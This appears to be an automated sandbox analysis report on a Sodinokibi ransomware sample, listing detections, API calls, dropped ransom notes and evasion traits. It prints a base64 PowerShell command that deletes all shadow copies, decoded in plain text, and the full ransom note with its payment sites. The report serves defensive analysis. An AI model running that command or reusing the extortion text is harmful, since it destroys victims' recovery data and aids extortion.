Process Memory Space: HAjXCphNj5.exe PID: 3876 | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Delete Shadow Copy Via Powershell
Source: Process started, Author: Joe Security, Data: Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\HAjXCphNj5.exe', ParentImage: C:\Users\user\Desktop\HAjXCphNj5.exe, ParentProcessId: 3876, ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, ProcessId: 6028
(The -e argument is a base64-encoded UTF-16LE string; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})

Signature Overview

AV Detection:

Found malware configuration
Source: HAjXCphNj5.exe.3876.0.memstr, Malware Configuration Extractor: Sodinokibi (the full extracted configuration is listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: HAjXCphNj5.exe Virustotal: Detection: 48%
Source: HAjXCphNj5.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: HAjXCphNj5.exe Joe Sandbox ML: detected
Source: 0.3.HAjXCphNj5.exe.d50000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00405086 CryptAcquireContextW,CryptGenRandom
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040596C CryptStringToBinaryW,CryptStringToBinaryW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_004059CD CryptBinaryToStringW,CryptBinaryToStringW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C5C1D CryptBinaryToStringW,CryptBinaryToStringW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C52D6 CryptAcquireContextW,CryptGenRandom
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C5BBC CryptStringToBinaryW,CryptStringToBinaryW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: z:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: x:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: v:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: t:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: r:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: p:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: n:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: l:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: j:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: h:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: f:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: d:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: b:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: y:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: w:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: u:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: s:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: q:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: o:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: m:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: k:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: i:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: g:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: c:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: a:
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_004070C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C7311 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose

        Networking:

Found Tor onion address
Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
Source: 9f8ugt-readme.txt30.0.dr String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmp String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.dr String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
Source: HAjXCphNj5.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: HAjXCphNj5.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: HAjXCphNj5.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: HAjXCphNj5.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: HAjXCphNj5.exe String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: HAjXCphNj5.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: HAjXCphNj5.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: HAjXCphNj5.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: HAjXCphNj5.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: HAjXCphNj5.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: HAjXCphNj5.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmp String found in binary or memory: http://decryptor.cc/
Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.dr String found in binary or memory: http://decryptor.cc/AC36CB5436CFD579
Source: HAjXCphNj5.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: HAjXCphNj5.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: HAjXCphNj5.exe String found in binary or memory: http://ocsp.digicert.com0N
Source: HAjXCphNj5.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: HAjXCphNj5.exe String found in binary or memory: http://ocsp.thawte.com0
Source: HAjXCphNj5.exe String found in binary or memory: http://th.symcb.com/th.crl0
Source: HAjXCphNj5.exe String found in binary or memory: http://th.symcb.com/th.crt0
Source: HAjXCphNj5.exe String found in binary or memory: http://th.symcd.com0&
Source: HAjXCphNj5.exe String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.dr String found in binary or memory: https://torproject.org/
Source: HAjXCphNj5.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: HAjXCphNj5.exe String found in binary or memory: https://www.thawte.com/cps0/
Source: HAjXCphNj5.exe String found in binary or memory: https://www.thawte.com/repository0W

        Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme
Source: C:\9f8ugt-readme.txt Dropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9f8ugt.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD5792) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/AC36CB5436CFD579Warning: secondary website can be blocked, thats why first variant much be
Yara detected Sodinokibi Ransomware
Source: Yara match File source: 00000000.00000003.782683038.0000000002E1F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.782448934.0000000002E1F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HAjXCphNj5.exe PID: 3876, type: MEMORY
Contains functionality to change the wallpaper
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C43EB GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File moved: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File deleted: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File moved: C:\Users\user\Desktop\WKXEWIOTXI\ZTGJILHXQB.xlsx
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File deleted: C:\Users\user\Desktop\WKXEWIOTXI\ZTGJILHXQB.xlsx
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File moved: C:\Users\user\Desktop\IPKGELNTQY.xlsx

        System Summary:

Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00403839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040B1B1
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00408507
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040A51C
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00407FE4
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00407D86
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C8234
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001CA76C
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001C7FD6
Source: HAjXCphNj5.exe Static PE information: invalid certificate
Source: HAjXCphNj5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs HAjXCphNj5.exe
Source: HAjXCphNj5.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.rans.evad.winEXE@5/208@0/0
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_004048DE GetDriveTypeW,GetDiskFreeSpaceExW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\program files\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\9f8ugt-readme.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icvcfwbc.myn.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Users\user\Desktop\HAjXCphNj5.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\HAjXCphNj5.exe 'C:\Users\user\Desktop\HAjXCphNj5.exe'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
Source: unknown Process created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Directory created: c:\program files\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

        Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Unpacked PE file: 0.2.HAjXCphNj5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.i6x:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Unpacked PE file: 0.2.HAjXCphNj5.exe.400000.0.unpack
Source: HAjXCphNj5.exe Static PE information: real checksum: 0x383da should be: 0x40753
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040E37B push 0000006Ah; retf 0_2_0040E454
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040E3E3 push 0000006Ah; retf 0_2_0040E454
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_0040E3E5 push 0000006Ah; retf 0_2_0040E454
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001CD835 push 0000006Ah; retf 0_2_001CD8A4
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001CD833 push 0000006Ah; retf 0_2_001CD8A4
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_001CD7CC push 0000006Ah; retf 0_2_001CD8A4
Source: C:\Users\user\Desktop\HAjXCphNj5.exe Code function: 0_2_00425BAC push eax; ret 0_2_00425BC6
Source: initial sample Static PE information: section name: .text entropy: 7.59878330544
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: C:\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\program files\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\program files (x86)\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\recovery\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\jay jay hammer\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\desktop\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\documents\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\downloads\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\favorites\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\links\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\music\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\pictures\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\saved games\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\default\videos\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\3d objects\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\contacts\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\downloads\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\favorites\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\links\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\music\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\onedrive\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\pictures\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\recent\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\saved games\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\searches\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\videos\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\accountpictures\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\desktop\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\documents\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\downloads\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\libraries\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\music\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\pictures\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\public\videos\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\bjzfppwapt\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\ipkgelntqy\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\klizusiqen\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\nvwzapqsql\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\qcfwyskmha\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\sfpusafiol\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\sqrkhnbnyn\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\suavtzknfl\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\vamydfpund\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\wkxewiotxi\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\zggknsukop\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\desktop\ztgjilhxqb\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\20200719\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\bjzfppwapt\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\ipkgelntqy\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\klizusiqen\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\nvwzapqsql\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\qcfwyskmha\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\sfpusafiol\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\sqrkhnbnyn\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\suavtzknfl\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\vamydfpund\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\wkxewiotxi\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\zggknsukop\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\documents\ztgjilhxqb\9f8ugt-readme.txt
Source: C:\Users\user\Desktop\HAjXCphNj5.exe File created: c:\users\user\favorites\links\9f8ugt-readme.txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        Contains functionality to detect sleep reduction / modifications
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_0040559A
